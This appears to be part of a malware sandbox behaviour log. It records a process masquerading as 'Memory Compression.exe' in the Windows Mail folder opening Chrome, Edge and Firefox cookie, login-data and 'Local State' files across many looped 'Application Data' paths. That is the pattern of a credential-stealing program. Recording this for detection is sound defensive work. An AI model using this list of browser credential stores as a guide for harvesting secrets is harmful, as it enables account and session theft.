                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Login Data
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data For Account
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Login Data
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Login Data-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data For Account-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Extension Cookies
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Application Data\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Local State
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data For Account
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Local State
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Local State
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local State
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journal
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journal
